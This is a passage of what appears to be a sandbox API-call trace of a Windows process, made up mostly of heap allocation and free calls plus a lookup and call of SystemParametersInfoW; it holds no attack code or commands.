Flags=0x0, Size=0x10) returned 0x2aab470 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0262.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0262.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0262.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0262.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0262.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0262.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0262.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0262.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0262.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0262.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0262.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0262.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0262.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0262.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0262.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0262.906] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0262.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0262.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0262.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0262.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0262.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0262.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0262.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0262.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0262.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0262.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0262.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0262.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0262.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0262.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0262.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0262.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0262.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0262.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0262.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0262.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0262.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0262.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0262.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0262.913] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0262.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0262.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0262.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0262.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f40 [0262.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f40, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0262.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0262.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0262.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0262.914] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0262.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0262.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0262.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0262.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0262.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0262.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0262.915] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0263.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0263.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0263.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0263.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0263.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0263.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0263.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0263.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0263.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0263.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0263.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 